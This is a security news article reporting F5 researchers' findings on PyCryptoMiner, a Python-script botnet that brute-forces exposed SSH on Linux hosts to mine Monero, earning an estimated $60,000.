Python-Based Botnet Targets Linux Systems with Exposed SSH Ports

Experts believe that an experienced cybercrime group has created a botnet from compromised Linux-based systems and is using these servers and devices to mine Monero, a digital currency.

Crooks are apparently using brute-force attacks against Linux systems that feature exposed SSH ports. If they guess the password, they use Python scripts to install a Monero miner.

According to experts from F5 Networks, attackers have also started using an exploit for the JBoss server (CVE-2017-12149) to break into vulnerable computers, but the SSH attacks and brute-force attacks represent this new botnet's bread and butter.

Python scripts are harder to detect

The attack is unique when compared to other Monero-mining botnets that have arisen in recent months, relying on Python scripts, rather than on malware binaries.

"Unlike a binary malware alternative, a scripting language-based malware is more evasive by nature as it can be easily obfuscated," F5 experts say. "It is also executed by a legitimate binary, which could be one of the PERL/Python/Bash/Go/PowerShell interpreters shipped with almost every Linux/Windows distribution."

Despite this, once researchers identified samples of the malware, its construction wasn't that complex.

How the PyCryptoMiner malware works

Experts say that after infecting victims, crooks download an initial and very simple base64-encoded "spearhead" Python script that gathers info on the victims' system and reports to a remote C&C server.

The server replies with a second Python script in the form of a Python dictionary file that installs a version of the open-source Minerd Monero mining client.

Experts say they identified two Monero wallets used by this botnet, which they named PyCryptoMiner. One contained 94 Monero and the second contained 64 Monero, for an approximate total of $60,000.

Botnet tied to old threat actor

Further, researchers said that the C&C domain names used by PyCryptoMiner were registered by an individual who was tied to over 36,000 domain names and 234 other email addresses, all used for domains involved in scams, gambling, and adult services.

One more thing that researchers found interesting was the fact that PyCryptoMiner used a hard-coded Pastebin link to retrieve the location of a backup C&C server when the main domain was down.

Experts say this Pastebin URL was viewed more than 175,000 times. This is not the botnet's real size, as bots could have viewed this page numerous times. A more clear indicator of the botnet's real size was the daily increase of around 1,000 views.

This is a very small Monero-mining botnet but was still enough for the authors to make over $60,000, showing how popular and profitable such botnets can be at the moment. Earlier this week, when F5 researchers published their findings, the botnet was down and out of service.

In recent months, Monero-mining malware has become quite popular. Excluding cryptojacking events —which also mine Monero— some of the Monero-mining malware families and botnets we've seen in 2017 include Digmine, an unnamed botnet targeting WordPress sites, Hexmen, Loapi, Zealot, WaterMiner, an unnamed botnet targeting IIS 6.0 servers, CodeFork, and Bondnet.